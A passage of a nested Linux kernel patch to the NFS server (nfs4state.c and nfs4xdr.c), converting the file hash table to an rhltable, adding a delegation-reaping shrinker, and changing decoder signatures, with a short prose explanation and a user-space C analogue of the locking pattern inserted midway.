+-find_file_locked(struct svc_fh *fh, unsigned int hashval)
++static noinline_for_stack struct nfs4_file *
++nfsd4_file_hash_lookup(const struct svc_fh *fhp)
+ {
+-	struct nfs4_file *fp;
++	struct inode *inode = d_inode(fhp->fh_dentry);
++	struct rhlist_head *tmp, *list;
++	struct nfs4_file *fi;
+ 
+-	hlist_for_each_entry_rcu(fp, &file_hashtbl[hashval], fi_hash,
+-				lockdep_is_held(&state_lock)) {
+-		if (fh_match(&fp->fi_fhandle, &fh->fh_handle)) {
+-			if (refcount_inc_not_zero(&fp->fi_ref))
+-				return fp;
++	rcu_read_lock();
++	list = rhltable_lookup(&nfs4_file_rhltable, &inode,
++			       nfs4_file_rhash_params);
++	rhl_for_each_entry_rcu(fi, tmp, list, fi_rlist) {
++		if (fh_match(&fi->fi_fhandle, &fhp->fh_handle)) {
++			if (refcount_inc_not_zero(&fi->fi_ref)) {
++				rcu_read_unlock();
++				return fi;
++			}
+ 		}
+ 	}
++	rcu_read_unlock();
+ 	return NULL;
+ }
+ 
+-static struct nfs4_file *insert_file(struct nfs4_file *new, struct svc_fh *fh,
+-				     unsigned int hashval)
++/*
++ * On hash insertion, identify entries with the same inode but
++ * distinct filehandles. They will all be on the list returned
++ * by rhltable_lookup().
++ *
++ * inode->i_lock prevents racing insertions from adding an entry
++ * for the same inode/fhp pair twice.
++ */
++static noinline_for_stack struct nfs4_file *
++nfsd4_file_hash_insert(struct nfs4_file *new, const struct svc_fh *fhp)
+ {
+-	struct nfs4_file *fp;
++	struct inode *inode = d_inode(fhp->fh_dentry);
++	struct rhlist_head *tmp, *list;
+ 	struct nfs4_file *ret = NULL;
+ 	bool alias_found = false;
++	struct nfs4_file *fi;
++	int err;
+ 
+-	spin_lock(&state_lock);
+-	hlist_for_each_entry_rcu(fp, &file_hashtbl[hashval], fi_hash,
+-				 lockdep_is_held(&state_lock)) {
+-		if (fh_match(&fp->fi_fhandle, &fh->fh_handle)) {
+-			if (refcount_inc_not_zero(&fp->fi_ref))
+-				ret = fp;
+-		} else if (d_inode(fh->fh_dentry) == fp->fi_inode)
+-			fp->fi_aliased = alias_found = true;
+-	}
+-	if (likely(ret == NULL)) {
+-		nfsd4_init_file(fh, hashval, new);
+-		new->fi_aliased = alias_found;
+-		ret = new;
++	rcu_read_lock();
++	spin_lock(&inode->i_lock);
++
++	list = rhltable_lookup(&nfs4_file_rhltable, &inode,
++			       nfs4_file_rhash_params);
++	rhl_for_each_entry_rcu(fi, tmp, list, fi_rlist) {
++		if (fh_match(&fi->fi_fhandle, &fhp->fh_handle)) {
++			if (refcount_inc_not_zero(&fi->fi_ref))
++				ret = fi;
++		} else
++			fi->fi_aliased = alias_found = true;
+ 	}
+-	spin_unlock(&state_lock);
+-	return ret;
+-}
++	if (ret)
++		goto out_unlock;
+ 
+-static struct nfs4_file * find_file(struct svc_fh *fh)
+-{
+-	struct nfs4_file *fp;
+-	unsigned int hashval = file_hashval(fh);
++	nfsd4_file_init(fhp, new);
++	err = rhltable_insert(&nfs4_file_rhltable, &new->fi_rlist,
++			      nfs4_file_rhash_params);
++	if (err)
++		goto out_unlock;
+ 
+-	rcu_read_lock();
+-	fp = find_file_locked(fh, hashval);
++	new->fi_aliased = alias_found;
++	ret = new;
++
++out_unlock:
++	spin_unlock(&inode->i_lock);
+ 	rcu_read_unlock();
+-	return fp;
++	return ret;
+ }
+ 
+-static struct nfs4_file *
+-find_or_add_file(struct nfs4_file *new, struct svc_fh *fh)
++static noinline_for_stack void nfsd4_file_hash_remove(struct nfs4_file *fi)
+ {
+-	struct nfs4_file *fp;
+-	unsigned int hashval = file_hashval(fh);
+-
+-	rcu_read_lock();
+-	fp = find_file_locked(fh, hashval);
+-	rcu_read_unlock();
+-	if (fp)
+-		return fp;
+-
+-	return insert_file(new, fh, hashval);
++	rhltable_remove(&nfs4_file_rhltable, &fi->fi_rlist,
++			nfs4_file_rhash_params);
+ }
+ 
+ /*
+@@ -4760,9 +4800,10 @@ nfs4_share_conflict(struct svc_fh *current_fh, unsigned int deny_type)
+ 	struct nfs4_file *fp;
+ 	__be32 ret = nfs_ok;
+ 
+-	fp = find_file(current_fh);
++	fp = nfsd4_file_hash_lookup(current_fh);
+ 	if (!fp)
+ 		return ret;
++
+ 	/* Check for conflicting share reservations */
+ 	spin_lock(&fp->fi_lock);
+ 	if (fp->fi_share_deny & deny_type)
+@@ -4774,7 +4815,7 @@ nfs4_share_conflict(struct svc_fh *current_fh, unsigned int deny_type)
+ 
+ static bool nfsd4_deleg_present(const struct inode *inode)
+ {
+-	struct file_lock_context *ctx = smp_load_acquire(&inode->i_flctx);
++	struct file_lock_context *ctx = locks_inode_context(inode);
+ 
+ 	return ctx && !list_empty_careful(&ctx->flc_lease);
+ }
+@@ -5655,7 +5696,9 @@ nfsd4_process_open2(struct svc_rqst *rqstp, struct svc_fh *current_fh, struct nf
+ 	 * and check for delegations in the process of being recalled.
+ 	 * If not found, create the nfs4_file struct
+ 	 */
+-	fp = find_or_add_file(open->op_file, current_fh);
++	fp = nfsd4_file_hash_insert(open->op_file, current_fh);
++	if (unlikely(!fp))
++		return nfserr_jukebox;
+ 	if (fp != open->op_file) {
+ 		status = nfs4_check_deleg(cl, open, &dp);
+ 		if (status)
+@@ -5932,7 +5975,7 @@ nfs4_lockowner_has_blockers(struct nfs4_lockowner *lo)
+ 
+ 	list_for_each_entry(stp, &lo->lo_owner.so_stateids, st_perstateowner) {
+ 		nf = stp->st_stid.sc_file;
+-		ctx = nf->fi_inode->i_flctx;
++		ctx = locks_inode_context(nf->fi_inode);
+ 		if (!ctx)
+ 			continue;
+ 		if (locks_owner_has_blockers(ctx, lo))
+@@ -6160,17 +6203,63 @@ laundromat_main(struct work_struct *laundry)
+ }
+ 
+ static void
+-courtesy_client_reaper(struct work_struct *reaper)
++courtesy_client_reaper(struct nfsd_net *nn)
+ {
+ 	struct list_head reaplist;
+-	struct delayed_work *dwork = to_delayed_work(reaper);
+-	struct nfsd_net *nn = container_of(dwork, struct nfsd_net,
+-					nfsd_shrinker_work);
+ 
+ 	nfs4_get_courtesy_client_reaplist(nn, &reaplist);
+ 	nfs4_process_client_reaplist(&reaplist);
+ }
+ 
++static void
++deleg_reaper(struct nfsd_net *nn)
++{
++	struct list_head *pos, *next;
++	struct nfs4_client *clp;
++	struct list_head cblist;
++
++	INIT_LIST_HEAD(&cblist);
++	spin_lock(&nn->client_lock);
++	list_for_each_safe(pos, next, &nn->client_lru) {
++		clp = list_entry(pos, struct nfs4_client, cl_lru);
++		if (clp->cl_state != NFSD4_ACTIVE ||
++			list_empty(&clp->cl_delegations) ||
++			atomic_read(&clp->cl_delegs_in_recall) ||
++			test_bit(NFSD4_CLIENT_CB_RECALL_ANY, &clp->cl_flags) ||
++			(ktime_get_boottime_seconds() -
++				clp->cl_ra_time < 5)) {
++			continue;
++		}
++		list_add(&clp->cl_ra_cblist, &cblist);
++
++		/* release in nfsd4_cb_recall_any_release */
++		atomic_inc(&clp->cl_rpc_users);
++		set_bit(NFSD4_CLIENT_CB_RECALL_ANY, &clp->cl_flags);
++		clp->cl_ra_time = ktime_get_boottime_seconds();
++	}
++	spin_unlock(&nn->client_lock);
++
++	while (!list_empty(&cblist)) {
++		clp = list_first_entry(&cblist, struct nfs4_client,
++					cl_ra_cblist);
++		list_del_init(&clp->cl_ra_cblist);
++		clp->cl_ra->ra_keep = 0;
++		clp->cl_ra->ra_bmval[0] = BIT(RCA4_TYPE_MASK_RDATA_DLG);
++		trace_nfsd_cb_recall_any(clp->cl_ra);
++		nfsd4_run_cb(&clp->cl_ra->ra_cb);
++	}
++}
++
++static void
++nfsd4_state_shrinker_worker(struct work_struct *work)
++{
++	struct nfsd_net *nn = container_of(work, struct nfsd_net,
++				nfsd_shrinker_work);
++
++	courtesy_client_reaper(nn);
++	deleg_reaper(nn);
++}
++
+ static inline __be32 nfs4_check_fh(struct svc_fh *fhp, struct nfs4_stid *stp)
+ {
+ 	if (!fh_match(&fhp->fh_handle, &stp->sc_file->fi_fhandle))
+@@ -6935,6 +7024,7 @@ nfsd4_delegreturn(struct svc_rqst *rqstp, struct nfsd4_compound_state *cstate,
+ 	if (status)
+ 		goto put_stateid;
+ 
++	trace_nfsd_deleg_return(stateid);
+ 	wake_up_var(d_inode(cstate->current_fh.fh_dentry));
+ 	destroy_delegation(dp);
+ put_stateid:
+@@ -7748,7 +7838,7 @@ check_for_locks(struct nfs4_file *fp, struct nfs4_lockowner *lowner)
+ 	}
+ 
+ 	inode = locks_inode(nf->nf_file);
+-	flctx = inode->i_flctx;
++	flctx = locks_inode_context(inode);
+ 
+ 	if (flctx && !list_empty_careful(&flctx->flc_posix)) {
+ 		spin_lock(&flctx->flc_lock);
+@@ -7995,11 +8085,20 @@ static int nfs4_state_create_net(struct net *net)
+ 	INIT_LIST_HEAD(&nn->blocked_locks_lru);
+ 
+ 	INIT_DELAYED_WORK(&nn->laundromat_work, laundromat_main);
+-	INIT_DELAYED_WORK(&nn->nfsd_shrinker_work, courtesy_client_reaper);
++	INIT_WORK(&nn->nfsd_shrinker_work, nfsd4_state_shrinker_worker);
+ 	get_net(net);
+ 
++	nn->nfsd_client_shrinker.scan_objects = nfsd4_state_shrinker_scan;
++	nn->nfsd_client_shrinker.count_objects = nfsd4_state_shrinker_count;
++	nn->nfsd_client_shrinker.seeks = DEFAULT_SEEKS;
++
++	if (register_shrinker(&nn->nfsd_client_shrinker, "nfsd-client"))
++		goto err_shrinker;
+ 	return 0;
+ 
++err_shrinker:
++	put_net(net);
++	kfree(nn->sessionid_hashtbl);
+ err_sessionid:
+ 	kfree(nn->unconf_id_hashtbl);
+ err_unconf_id:
+@@ -8071,10 +8170,16 @@ nfs4_state_start(void)
+ {
+ 	int ret;
+ 
+-	ret = nfsd4_create_callback_queue();
++	ret = rhltable_init(&nfs4_file_rhltable, &nfs4_file_rhash_params);
+ 	if (ret)
+ 		return ret;
+ 
++	ret = nfsd4_create_callback_queue();
++	if (ret) {
++		rhltable_destroy(&nfs4_file_rhltable);
++		return ret;
++	}
++
+ 	set_max_delegations();
+ 	return 0;
+ }
+@@ -8086,6 +8191,8 @@ nfs4_state_shutdown_net(struct net *net)
+ 	struct list_head *pos, *next, reaplist;
+ 	struct nfsd_net *nn = net_generic(net, nfsd_net_id);
+ 
++	unregister_shrinker(&nn->nfsd_client_shrinker);
++	cancel_work(&nn->nfsd_shrinker_work);
+ 	cancel_delayed_work_sync(&nn->laundromat_work);
+ 	locks_end_grace(&nn->nfsd4_manager);
+ 
+@@ -8114,6 +8221,7 @@ void
+ nfs4_state_shutdown(void)
+ {
+ 	nfsd4_destroy_callback_queue();
++	rhltable_destroy(&nfs4_file_rhltable);
+ }
+ 
+ static void
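
The nfs4state.c conversion replaces the fixed 256-bucket file_hashtbl, keyed
on inode number, with an rhltable keyed on the inode pointer: each key maps to
a list of nfs4_file entries, since several distinct filehandles can refer to
one inode, and insertion re-checks under inode->i_lock so racing opens cannot
add the same inode/filehandle pair twice (the same walk doubles as fi_aliased
detection). A user-space analogue of the lookup-then-insert discipline, with
illustrative names and sizes:

#include <pthread.h>
#include <stdlib.h>
#include <string.h>

struct file_ent {
	const void *inode;		/* primary hash key */
	char fh[32];			/* secondary match, like fh_match() */
	int refs;
	struct file_ent *next;
};

#define NBUCKETS 256
static struct file_ent *buckets[NBUCKETS];
static pthread_mutex_t bucket_lock = PTHREAD_MUTEX_INITIALIZER;

static size_t hash_inode(const void *inode)
{
	return ((size_t)inode >> 4) % NBUCKETS;
}

static struct file_ent *lookup_locked(const void *inode, const char *fh)
{
	struct file_ent *e;

	for (e = buckets[hash_inode(inode)]; e; e = e->next)
		if (e->inode == inode && !memcmp(e->fh, fh, sizeof(e->fh)))
			return e;
	return NULL;
}

static struct file_ent *find_or_insert(const void *inode, const char *fh)
{
	struct file_ent *e;

	pthread_mutex_lock(&bucket_lock);
	e = lookup_locked(inode, fh);	/* re-check under the lock */
	if (e) {
		e->refs++;
	} else {
		e = calloc(1, sizeof(*e));
		if (e) {
			e->inode = inode;
			memcpy(e->fh, fh, sizeof(e->fh));
			e->refs = 1;
			e->next = buckets[hash_inode(inode)];
			buckets[hash_inode(inode)] = e;
		}
	}
	pthread_mutex_unlock(&bucket_lock);
	return e;
}
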
+diff --git a/fs/nfsd/nfs4xdr.c b/fs/nfsd/nfs4xdr.c
+index 89a579be042e5..597f14a80512f 100644
+--- a/fs/nfsd/nfs4xdr.c
++++ b/fs/nfsd/nfs4xdr.c
+@@ -770,16 +770,18 @@ nfsd4_decode_cb_sec(struct nfsd4_compoundargs *argp, struct nfsd4_cb_sec *cbs)
+ 
+ static __be32
+ nfsd4_decode_access(struct nfsd4_compoundargs *argp,
+-		    struct nfsd4_access *access)
++		    union nfsd4_op_u *u)
+ {
++	struct nfsd4_access *access = &u->access;
+ 	if (xdr_stream_decode_u32(argp->xdr, &access->ac_req_access) < 0)
+ 		return nfserr_bad_xdr;
+ 	return nfs_ok;
+ }
+ 
+ static __be32
+-nfsd4_decode_close(struct nfsd4_compoundargs *argp, struct nfsd4_close *close)
++nfsd4_decode_close(struct nfsd4_compoundargs *argp, union nfsd4_op_u *u)
+ {
++	struct nfsd4_close *close = &u->close;
+ 	if (xdr_stream_decode_u32(argp->xdr, &close->cl_seqid) < 0)
+ 		return nfserr_bad_xdr;
+ 	return nfsd4_decode_stateid4(argp, &close->cl_stateid);
+@@ -787,8 +789,9 @@ nfsd4_decode_close(struct nfsd4_compoundargs *argp, struct nfsd4_close *close)
+ 
+ 
+ static __be32
+-nfsd4_decode_commit(struct nfsd4_compoundargs *argp, struct nfsd4_commit *commit)
++nfsd4_decode_commit(struct nfsd4_compoundargs *argp, union nfsd4_op_u *u)
+ {
++	struct nfsd4_commit *commit = &u->commit;
+ 	if (xdr_stream_decode_u64(argp->xdr, &commit->co_offset) < 0)
+ 		return nfserr_bad_xdr;
+ 	if (xdr_stream_decode_u32(argp->xdr, &commit->co_count) < 0)
+@@ -798,8 +801,9 @@ nfsd4_decode_commit(struct nfsd4_compoundargs *argp, struct nfsd4_commit *commit
+ }
+ 
+ static __be32
+-nfsd4_decode_create(struct nfsd4_compoundargs *argp, struct nfsd4_create *create)
++nfsd4_decode_create(struct nfsd4_compoundargs *argp, union nfsd4_op_u *u)
+ {
++	struct nfsd4_create *create = &u->create;
+ 	__be32 *p, status;
+ 
+ 	memset(create, 0, sizeof(*create));
+@@ -844,22 +848,25 @@ nfsd4_decode_create(struct nfsd4_compoundargs *argp, struct nfsd4_create *create
+ }
+ 
+ static inline __be32
+-nfsd4_decode_delegreturn(struct nfsd4_compoundargs *argp, struct nfsd4_delegreturn *dr)
++nfsd4_decode_delegreturn(struct nfsd4_compoundargs *argp, union nfsd4_op_u *u)
+ {
++	struct nfsd4_delegreturn *dr = &u->delegreturn;
+ 	return nfsd4_decode_stateid4(argp, &dr->dr_stateid);
+ }
+ 
+ static inline __be32
+-nfsd4_decode_getattr(struct nfsd4_compoundargs *argp, struct nfsd4_getattr *getattr)
++nfsd4_decode_getattr(struct nfsd4_compoundargs *argp, union nfsd4_op_u *u)
+ {
++	struct nfsd4_getattr *getattr = &u->getattr;
+ 	memset(getattr, 0, sizeof(*getattr));
+ 	return nfsd4_decode_bitmap4(argp, getattr->ga_bmval,
+ 				    ARRAY_SIZE(getattr->ga_bmval));
+ }
+ 
+ static __be32
+-nfsd4_decode_link(struct nfsd4_compoundargs *argp, struct nfsd4_link *link)
++nfsd4_decode_link(struct nfsd4_compoundargs *argp, union nfsd4_op_u *u)
+ {
++	struct nfsd4_link *link = &u->link;
+ 	memset(link, 0, sizeof(*link));
+ 	return nfsd4_decode_component4(argp, &link->li_name, &link->li_namelen);
+ }
+@@ -907,8 +914,9 @@ nfsd4_decode_locker4(struct nfsd4_compoundargs *argp, struct nfsd4_lock *lock)
+ }
+ 
+ static __be32
+-nfsd4_decode_lock(struct nfsd4_compoundargs *argp, struct nfsd4_lock *lock)
++nfsd4_decode_lock(struct nfsd4_compoundargs *argp, union nfsd4_op_u *u)
+ {
++	struct nfsd4_lock *lock = &u->lock;
+ 	memset(lock, 0, sizeof(*lock));
+ 	if (xdr_stream_decode_u32(argp->xdr, &lock->lk_type) < 0)
+ 		return nfserr_bad_xdr;
+@@ -924,8 +932,9 @@ nfsd4_decode_lock(struct nfsd4_compoundargs *argp, struct nfsd4_lock *lock)
+ }
+ 
+ static __be32
+-nfsd4_decode_lockt(struct nfsd4_compoundargs *argp, struct nfsd4_lockt *lockt)
++nfsd4_decode_lockt(struct nfsd4_compoundargs *argp, union nfsd4_op_u *u)
+ {
++	struct nfsd4_lockt *lockt = &u->lockt;
+ 	memset(lockt, 0, sizeof(*lockt));
+ 	if (xdr_stream_decode_u32(argp->xdr, &lockt->lt_type) < 0)
+ 		return nfserr_bad_xdr;
+@@ -940,8 +949,9 @@ nfsd4_decode_lockt(struct nfsd4_compoundargs *argp, struct nfsd4_lockt *lockt)
+ }
+ 
+ static __be32
+-nfsd4_decode_locku(struct nfsd4_compoundargs *argp, struct nfsd4_locku *locku)
++nfsd4_decode_locku(struct nfsd4_compoundargs *argp, union nfsd4_op_u *u)
+ {
++	struct nfsd4_locku *locku = &u->locku;
+ 	__be32 status;
+ 
+ 	if (xdr_stream_decode_u32(argp->xdr, &locku->lu_type) < 0)
+@@ -962,8 +972,9 @@ nfsd4_decode_locku(struct nfsd4_compoundargs *argp, struct nfsd4_locku *locku)
+ }
+ 
+ static __be32
+-nfsd4_decode_lookup(struct nfsd4_compoundargs *argp, struct nfsd4_lookup *lookup)
++nfsd4_decode_lookup(struct nfsd4_compoundargs *argp, union nfsd4_op_u *u)
+ {
++	struct nfsd4_lookup *lookup = &u->lookup;
+ 	return nfsd4_decode_component4(argp, &lookup->lo_name, &lookup->lo_len);
+ }
+ 
+@@ -1143,8 +1154,9 @@ nfsd4_decode_open_claim4(struct nfsd4_compoundargs *argp,
+ }
+ 
+ static __be32
+-nfsd4_decode_open(struct nfsd4_compoundargs *argp, struct nfsd4_open *open)
++nfsd4_decode_open(struct nfsd4_compoundargs *argp, union nfsd4_op_u *u)
+ {
++	struct nfsd4_open *open = &u->open;
+ 	__be32 status;
+ 	u32 dummy;
+ 
+@@ -1171,8 +1183,10 @@ nfsd4_decode_open(struct nfsd4_compoundargs *argp, struct nfsd4_open *open)
+ }
+ 
+ static __be32
+-nfsd4_decode_open_confirm(struct nfsd4_compoundargs *argp, struct nfsd4_open_confirm *open_conf)
++nfsd4_decode_open_confirm(struct nfsd4_compoundargs *argp,
++			  union nfsd4_op_u *u)
+ {
++	struct nfsd4_open_confirm *open_conf = &u->open_confirm;
+ 	__be32 status;
+ 
+ 	if (argp->minorversion >= 1)
+@@ -1190,8 +1204,10 @@ nfsd4_decode_open_confirm(struct nfsd4_compoundargs *argp, struct nfsd4_open_con
+ }
+ 
+ static __be32
+-nfsd4_decode_open_downgrade(struct nfsd4_compoundargs *argp, struct nfsd4_open_downgrade *open_down)
++nfsd4_decode_open_downgrade(struct nfsd4_compoundargs *argp,
++			    union nfsd4_op_u *u)
+ {
++	struct nfsd4_open_downgrade *open_down = &u->open_downgrade;
+ 	__be32 status;
+ 
+ 	memset(open_down, 0, sizeof(*open_down));
+@@ -1209,8 +1225,9 @@ nfsd4_decode_open_downgrade(struct nfsd4_compoundargs *argp, struct nfsd4_open_d
+ }
+ 
+ static __be32
+-nfsd4_decode_putfh(struct nfsd4_compoundargs *argp, struct nfsd4_putfh *putfh)
++nfsd4_decode_putfh(struct nfsd4_compoundargs *argp, union nfsd4_op_u *u)
+ {
++	struct nfsd4_putfh *putfh = &u->putfh;
+ 	__be32 *p;
+ 
+ 	if (xdr_stream_decode_u32(argp->xdr, &putfh->pf_fhlen) < 0)
+@@ -1229,7 +1246,7 @@ nfsd4_decode_putfh(struct nfsd4_compoundargs *argp, struct nfsd4_putfh *putfh)
+ }
+ 
+ static __be32
+-nfsd4_decode_putpubfh(struct nfsd4_compoundargs *argp, void *p)
++nfsd4_decode_putpubfh(struct nfsd4_compoundargs *argp, union nfsd4_op_u *p)
+ {
+ 	if (argp->minorversion == 0)
+ 		return nfs_ok;
+@@ -1237,8 +1254,9 @@ nfsd4_decode_putpubfh(struct nfsd4_compoundargs *argp, void *p)
+ }
+ 
+ static __be32
+-nfsd4_decode_read(struct nfsd4_compoundargs *argp, struct nfsd4_read *read)
++nfsd4_decode_read(struct nfsd4_compoundargs *argp, union nfsd4_op_u *u)
+ {
++	struct nfsd4_read *read = &u->read;
+ 	__be32 status;
+ 
+ 	memset(read, 0, sizeof(*read));
+@@ -1254,8 +1272,9 @@ nfsd4_decode_read(struct nfsd4_compoundargs *argp, struct nfsd4_read *read)
+ }
+ 
+ static __be32
+-nfsd4_decode_readdir(struct nfsd4_compoundargs *argp, struct nfsd4_readdir *readdir)
++nfsd4_decode_readdir(struct nfsd4_compoundargs *argp, union nfsd4_op_u *u)
+ {
++	struct nfsd4_readdir *readdir = &u->readdir;
+ 	__be32 status;
+ 
+ 	memset(readdir, 0, sizeof(*readdir));
+@@ -1276,15 +1295,17 @@ nfsd4_decode_readdir(struct nfsd4_compoundargs *argp, struct nfsd4_readdir *read
+ }
+ 
+ static __be32
+-nfsd4_decode_remove(struct nfsd4_compoundargs *argp, struct nfsd4_remove *remove)
++nfsd4_decode_remove(struct nfsd4_compoundargs *argp, union nfsd4_op_u *u)
+ {
++	struct nfsd4_remove *remove = &u->remove;
+ 	memset(&remove->rm_cinfo, 0, sizeof(remove->rm_cinfo));
+ 	return nfsd4_decode_component4(argp, &remove->rm_name, &remove->rm_namelen);
+ }
+ 
+ static __be32
+-nfsd4_decode_rename(struct nfsd4_compoundargs *argp, struct nfsd4_rename *rename)
++nfsd4_decode_rename(struct nfsd4_compoundargs *argp, union nfsd4_op_u *u)
+ {
++	struct nfsd4_rename *rename = &u->rename;
+ 	__be32 status;
+ 
+ 	memset(rename, 0, sizeof(*rename));
+@@ -1295,22 +1316,25 @@ nfsd4_decode_rename(struct nfsd4_compoundargs *argp, struct nfsd4_rename *rename
+ }
+ 
+ static __be32
+-nfsd4_decode_renew(struct nfsd4_compoundargs *argp, clientid_t *clientid)
++nfsd4_decode_renew(struct nfsd4_compoundargs *argp, union nfsd4_op_u *u)
+ {
++	clientid_t *clientid = &u->renew;
+ 	return nfsd4_decode_clientid4(argp, clientid);
+ }
+ 
+ static __be32
+ nfsd4_decode_secinfo(struct nfsd4_compoundargs *argp,
+-		     struct nfsd4_secinfo *secinfo)
++		     union nfsd4_op_u *u)
+ {
++	struct nfsd4_secinfo *secinfo = &u->secinfo;
+ 	secinfo->si_exp = NULL;
+ 	return nfsd4_decode_component4(argp, &secinfo->si_name, &secinfo->si_namelen);
+ }
+ 
+ static __be32
+-nfsd4_decode_setattr(struct nfsd4_compoundargs *argp, struct nfsd4_setattr *setattr)
++nfsd4_decode_setattr(struct nfsd4_compoundargs *argp, union nfsd4_op_u *u)
+ {
++	struct nfsd4_setattr *setattr = &u->setattr;
+ 	__be32 status;
+ 
+ 	memset(setattr, 0, sizeof(*setattr));
+@@ -1324,8 +1348,9 @@ nfsd4_decode_setattr(struct nfsd4_compoundargs *argp, struct nfsd4_setattr *seta
+ }
+ 
+ static __be32
+-nfsd4_decode_setclientid(struct nfsd4_compoundargs *argp, struct nfsd4_setclientid *setclientid)
++nfsd4_decode_setclientid(struct nfsd4_compoundargs *argp, union nfsd4_op_u *u)
+ {
++	struct nfsd4_setclientid *setclientid = &u->setclientid;
+ 	__be32 *p, status;
+ 
+ 	memset(setclientid, 0, sizeof(*setclientid));
+@@ -1367,8 +1392,10 @@ nfsd4_decode_setclientid(struct nfsd4_compoundargs *argp, struct nfsd4_setclient
+ }
+ 
+ static __be32
+-nfsd4_decode_setclientid_confirm(struct nfsd4_compoundargs *argp, struct nfsd4_setclientid_confirm *scd_c)
++nfsd4_decode_setclientid_confirm(struct nfsd4_compoundargs *argp,
++				 union nfsd4_op_u *u)
+ {
++	struct nfsd4_setclientid_confirm *scd_c = &u->setclientid_confirm;
+ 	__be32 status;
+ 
+ 	if (argp->minorversion >= 1)
+@@ -1382,8 +1409,9 @@ nfsd4_decode_setclientid_confirm(struct nfsd4_compoundargs *argp, struct nfsd4_s
+ 
+ /* Also used for NVERIFY */
+ static __be32
+-nfsd4_decode_verify(struct nfsd4_compoundargs *argp, struct nfsd4_verify *verify)
++nfsd4_decode_verify(struct nfsd4_compoundargs *argp, union nfsd4_op_u *u)
+ {
++	struct nfsd4_verify *verify = &u->verify;
+ 	__be32 *p, status;
+ 
+ 	memset(verify, 0, sizeof(*verify));
+@@ -1409,8 +1437,9 @@ nfsd4_decode_verify(struct nfsd4_compoundargs *argp, struct nfsd4_verify *verify
+ }
+ 
+ static __be32
+-nfsd4_decode_write(struct nfsd4_compoundargs *argp, struct nfsd4_write *write)
++nfsd4_decode_write(struct nfsd4_compoundargs *argp, union nfsd4_op_u *u)
+ {
++	struct nfsd4_write *write = &u->write;
+ 	__be32 status;
+ 
+ 	status = nfsd4_decode_stateid4(argp, &write->wr_stateid);
+@@ -1434,8 +1463,10 @@ nfsd4_decode_write(struct nfsd4_compoundargs *argp, struct nfsd4_write *write)
+ }
+ 
+ static __be32
+-nfsd4_decode_release_lockowner(struct nfsd4_compoundargs *argp, struct nfsd4_release_lockowner *rlockowner)
++nfsd4_decode_release_lockowner(struct nfsd4_compoundargs *argp,
++			       union nfsd4_op_u *u)
+ {
++	struct nfsd4_release_lockowner *rlockowner = &u->release_lockowner;
+ 	__be32 status;
+ 
+ 	if (argp->minorversion >= 1)
+@@ -1452,16 +1483,20 @@ nfsd4_decode_release_lockowner(struct nfsd4_compoundargs *argp, struct nfsd4_rel
+ 	return nfs_ok;
+ }
+ 
+-static __be32 nfsd4_decode_backchannel_ctl(struct nfsd4_compoundargs *argp, struct nfsd4_backchannel_ctl *bc)
++static __be32 nfsd4_decode_backchannel_ctl(struct nfsd4_compoundargs *argp,
++					   union nfsd4_op_u *u)
+ {
++	struct nfsd4_backchannel_ctl *bc = &u->backchannel_ctl;
+ 	memset(bc, 0, sizeof(*bc));
+ 	if (xdr_stream_decode_u32(argp->xdr, &bc->bc_cb_program) < 0)
+ 		return nfserr_bad_xdr;
+ 	return nfsd4_decode_cb_sec(argp, &bc->bc_cb_sec);
+ }
+ 
+-static __be32 nfsd4_decode_bind_conn_to_session(struct nfsd4_compoundargs *argp, struct nfsd4_bind_conn_to_session *bcts)
++static __be32 nfsd4_decode_bind_conn_to_session(struct nfsd4_compoundargs *argp,
++						union nfsd4_op_u *u)
+ {
++	struct nfsd4_bind_conn_to_session *bcts = &u->bind_conn_to_session;
+ 	u32 use_conn_in_rdma_mode;
+ 	__be32 status;
+ 
+@@ -1603,8 +1638,9 @@ nfsd4_decode_nfs_impl_id4(struct nfsd4_compoundargs *argp,
+ 
+ static __be32
+ nfsd4_decode_exchange_id(struct nfsd4_compoundargs *argp,
+-			 struct nfsd4_exchange_id *exid)
++			 union nfsd4_op_u *u)
+ {
++	struct nfsd4_exchange_id *exid = &u->exchange_id;
+ 	__be32 status;
+ 
+ 	memset(exid, 0, sizeof(*exid));
+@@ -1656,8 +1692,9 @@ nfsd4_decode_channel_attrs4(struct nfsd4_compoundargs *argp,
+ 
+ static __be32
+ nfsd4_decode_create_session(struct nfsd4_compoundargs *argp,
+-			    struct nfsd4_create_session *sess)
++			    union nfsd4_op_u *u)
+ {
++	struct nfsd4_create_session *sess = &u->create_session;
+ 	__be32 status;
+ 
+ 	memset(sess, 0, sizeof(*sess));
+@@ -1681,23 +1718,26 @@ nfsd4_decode_create_session(struct nfsd4_compoundargs *argp,
+ 
+ static __be32
+ nfsd4_decode_destroy_session(struct nfsd4_compoundargs *argp,
+-			     struct nfsd4_destroy_session *destroy_session)
++			     union nfsd4_op_u *u)
+ {
++	struct nfsd4_destroy_session *destroy_session = &u->destroy_session;
+ 	return nfsd4_decode_sessionid4(argp, &destroy_session->sessionid);
+ }
+ 
+ static __be32
+ nfsd4_decode_free_stateid(struct nfsd4_compoundargs *argp,
+-			  struct nfsd4_free_stateid *free_stateid)
++			  union nfsd4_op_u *u)
+ {
++	struct nfsd4_free_stateid *free_stateid = &u->free_stateid;
+ 	return nfsd4_decode_stateid4(argp, &free_stateid->fr_stateid);
+ }
+ 
+ #ifdef CONFIG_NFSD_PNFS
+ static __be32
+ nfsd4_decode_getdeviceinfo(struct nfsd4_compoundargs *argp,
+-		struct nfsd4_getdeviceinfo *gdev)
++		union nfsd4_op_u *u)
+ {
++	struct nfsd4_getdeviceinfo *gdev = &u->getdeviceinfo;
+ 	__be32 status;
+ 
+ 	memset(gdev, 0, sizeof(*gdev));
+@@ -1717,8 +1757,9 @@ nfsd4_decode_getdeviceinfo(struct nfsd4_compoundargs *argp,
+ 
+ static __be32
+ nfsd4_decode_layoutcommit(struct nfsd4_compoundargs *argp,
+-			  struct nfsd4_layoutcommit *lcp)
++			  union nfsd4_op_u *u)
+ {
++	struct nfsd4_layoutcommit *lcp = &u->layoutcommit;
+ 	__be32 *p, status;
+ 
+ 	memset(lcp, 0, sizeof(*lcp));
+@@ -1753,8 +1794,9 @@ nfsd4_decode_layoutcommit(struct nfsd4_compoundargs *argp,
+ 
+ static __be32
+ nfsd4_decode_layoutget(struct nfsd4_compoundargs *argp,
+-		struct nfsd4_layoutget *lgp)
++		union nfsd4_op_u *u)
+ {
++	struct nfsd4_layoutget *lgp = &u->layoutget;
+ 	__be32 status;
+ 
+ 	memset(lgp, 0, sizeof(*lgp));
+@@ -1781,8 +1823,9 @@ nfsd4_decode_layoutget(struct nfsd4_compoundargs *argp,
+ 
+ static __be32
